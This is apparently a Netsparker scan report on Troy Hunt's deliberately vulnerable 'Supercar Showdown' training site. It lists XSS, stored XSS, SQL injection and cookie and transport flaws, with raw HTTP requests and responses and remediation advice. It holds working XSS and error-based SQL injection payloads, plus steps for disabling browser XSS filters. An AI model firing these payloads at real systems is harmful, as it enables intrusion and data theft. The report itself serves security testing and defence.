Form target action: https://hackyourselffirst.troyhunt.com/Account/Login
Request:
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: 
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><l…
MEDIUM: 3 total

9. [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML, JavaScript or VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Although Netsparker believes there is cross-site scripting here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact: There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking users' active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks

Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.

There are a number of pre-defined, well-structured whitelist libraries available for many different environments. Good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote

Parameters:
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers with automatic MIME sniffing, such as Internet Explorer.
Certainty
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000437)%3C/scRipt%3E
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt

Parameters:
Parameter | Type | Value
nsextt | GET | '"--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>

Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers with automatic MIME sniffing, such as Internet Explorer.
Certainty
Request:
GET /api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int. at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make/1 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR

Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
IMPORTANT: 1 total, 1 confirmed

3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML, JavaScript or VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact: There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking users' active session
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks

Remedy: The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex; therefore it is strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

Remedy References: Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
3.1 Search (CONFIRMED)
http://hackyourselffirst.troyhunt.com/Search?searchTerm='%2Bnetsparker(9)%2B'
Parameters
Parameter | Type | Value
searchTerm | GET | '+netsparker(9)+'
Request
GET /Search?searchTerm='%2Bnetsparker(9)%2B' HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">'+netsparker(9)+'</span>&quot;</h2>
<p class="alert alert-error">No results found for your search.</p>
</section><hr /><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val(''+netsparker(9)+'');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
1 TOTAL | IMPORTANT | CONFIRMED: 1
4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.
Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- User's session-sensitive information, such as cookies, can be stolen.
- XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References
- [ASP.NET] - Microsoft Anti-XSS Library
- OWASP XSS Prevention Cheat Sheet
- OWASP AntiSamy Java
External References
- XSS Cheat Sheet
- OWASP - Cross-site Scripting
- XSS Shell
- XSS Tunnelling
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 Supercar/3 (CONFIRMED)
http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL
http://hackyourselffirst.troyhunt.com/api/vote
Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e
Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1
Identification Response
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
1 TOTAL | IMPORTANT | CONFIRMED: 1
5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 Account/Register (CONFIRMED)
http://hackyourselffirst.troyhunt.com/Account/Register
Form target action
http://hackyourselffirst.troyhunt.com/Account/Register
Request
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1 TOTAL | IMPORTANT | CONFIRMED: 1
6. Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.
Impact
This cookie will be transmitted over an HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Remedy
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References
- .NET Cookie Secure Property
- How to Create Totally Secure Cookies
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 Account/Login (CONFIRMED)
https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie
AuthCookie
Request
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
1 TOTAL | IMPORTANT
7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL.
Impact
Since this is an old version of the software, it may be vulnerable to attacks.
Remedy
